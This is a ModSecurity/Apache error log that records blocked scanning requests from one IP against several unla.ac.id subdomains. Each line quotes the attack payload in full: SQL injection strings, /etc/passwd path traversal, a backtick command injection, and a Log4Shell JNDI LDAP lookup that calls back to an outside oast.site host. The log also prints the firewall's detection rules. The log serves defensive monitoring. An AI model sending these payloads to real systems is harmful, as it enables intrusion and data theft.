[Tue Aug 29 11:31:17.323899 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO10lcCo-f0AAAQMrpQAAAAu"]
[Tue Aug 29 11:31:17.324483 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lcCo-f0AAAP8GysAAAAV"]
[Tue Aug 29 11:31:17.331421 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO10lcCo-f0AAAQSWKkAAAA0"]
[Tue Aug 29 11:31:17.338650 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO10lcCo-f0AAAOM4d0AAAAU"]
[Tue Aug 29 11:31:17.340890 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO10lcCo-f0AAAQJWrQAAAAr"]
[Tue Aug 29 11:31:17.341392 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lcCo-f0AAAP@MxQAAAAZ"]
[Tue Aug 29 11:31:17.343108 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO10lcCo-f0AAAPMmHkAAAAY"]
[Tue Aug 29 11:31:17.343149 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lcCo-f0AAAQR44AAAAAz"]
[Tue Aug 29 11:31:17.343935 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lcCo-f0AAAPDn5cAAAAP"]
[Tue Aug 29 11:31:17.343990 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO10lcCo-f0AAAQP65wAAAAx"]
[Tue Aug 29 11:31:17.355187 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lcCo-f0AAAQDFSYAAAAl"]
[Tue Aug 29 11:31:17.360036 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO10lcCo-f0AAAOM4d4AAAAU"]
[Tue Aug 29 11:31:17.365186 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO10lcCo-f0AAAPDn5gAAAAP"]
[Tue Aug 29 11:31:17.365657 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO10lcCo-f0AAAQP650AAAAx"]
[Tue Aug 29 11:31:17.366178 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lcCo-f0AAAQJWrUAAAAr"]
[Tue Aug 29 11:31:17.406742 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../ found within ARGS:payload: `ls>../2UdxkOOWwm6uOELSJnJyclAZM5S`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi-bin/downloadFlile.cgi"] [unique_id "ZO10lcCo-f0AAAPMmHoAAAAY"]
[Tue Aug 29 11:31:18.326804 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:OFBiz.Visitor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:OFBiz.Visitor: ${jndi:ldap://${:-381}${:-522}.${hostName}.cookie.cjmn8l5jmimk2adbbnlg1dbji34jsobef.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webtools/control/main"] [unique_id "ZO10lsCo-f0AAAP7dZEAAAAR"]
[Tue Aug 29 11:31:18.328293 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../ found within ARGS:payload: `ls>../2UdxkOOWwm6uOELSJnJyclAZM5S`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/downloadFlile.cgi"] [unique_id "ZO10lsCo-f0AAAQNwEwAAAAv"]
[Tue Aug 29 11:31:18.337122 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../ found within ARGS:payload: `ls>../2UdxkOOWwm6uOELSJnJyclAZM5S`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/downloadFlile.cgi"] [unique_id "ZO10lsCo-f0AAAPRNgUAAAAf"]
[Tue Aug 29 11:31:18.355657 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../ found within ARGS:payload: `ls>../2UdxkOOWwm6uOELSJnJyclAZM5S`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/downloadFlile.cgi"] [unique_id "ZO10lsCo-f0AAAPPS1wAAAAd"]
[Tue Aug 29 11:31:18.393142 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:OFBiz.Visitor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:OFBiz.Visitor: ${jndi:ldap://${:-381}${:-522}.${hostName}.cookie.cjmn8l5jmimk2adbbnlgqknx1r5w5i85r.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/webtools/control/main"] [unique_id "ZO10lsCo-f0AAAQP658AAAAx"]
[Tue Aug 29 11:31:18.443232 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../ found within ARGS:payload: `ls>../2UdxkOOWwm6uOELSJnJyclAZM5S`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/downloadFlile.cgi"] [unique_id "ZO10lsCo-f0AAAQEGHIAAAAm"]
[Tue Aug 29 11:31:20.311500 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../ found within ARGS:payload: `ls>../2UdxkOOWwm6uOELSJnJyclAZM5S`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/downloadFlile.cgi"] [unique_id "ZO10mMCo-f0AAAQSWLEAAAA0"]
[Tue Aug 29 11:31:20.342430 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:template_path: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-json/lp/v1/courses/archive-course"] [unique_id "ZO10mMCo-f0AAAQTKG4AAAA1"]
[Tue Aug 29 11:31:20.343444 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:template_path: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-json/lp/v1/courses/archive-course"] [unique_id "ZO10mMCo-f0AAAQP66MAAAAx"]
[Tue Aug 29 11:31:20.343902 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:template_path: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-json/lp/v1/courses/archive-course"] [unique_id "ZO10mMCo-f0AAAQSWLIAAAA0"]
[Tue Aug 29 11:31:20.362483 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:template_path: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-json/lp/v1/courses/archive-course"] [unique_id "ZO10mMCo-f0AAAQJWrwAAAAr"]
[Tue Aug 29 11:31:20.373139 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:template_path: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-json/lp/v1/courses/archive-course"] [unique_id "ZO10mMCo-f0AAAQFcRQAAAAn"]
[Tue Aug 29 11:31:21.325552 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:template_path: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-json/lp/v1/courses/archive-course"] [unique_id "ZO10mcCo-f0AAAPRNgsAAAAf"]
[Tue Aug 29 11:31:22.480251 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: /* found within ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli: id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC [hostname "pusatbahasa.unla.ac.id"] [uri "/search/members/"] [unique_id "ZO10msCo-f0AAAQJWsEAAAAr"]
[Tue Aug 29 11:31:22.483177 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: /* found within ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli: id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC [hostname "informatika.unla.ac.id"] [uri "/search/members/"] [unique_id "ZO10msCo-f0AAAQQykUAAAAy"]
[Tue Aug 29 11:31:22.487370 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: /* found within ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli: id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC [hostname "journal.unla.ac.id"] [uri "/search/members/"] [unique_id "ZO10msCo-f0AAAQTKHIAAAA1"]
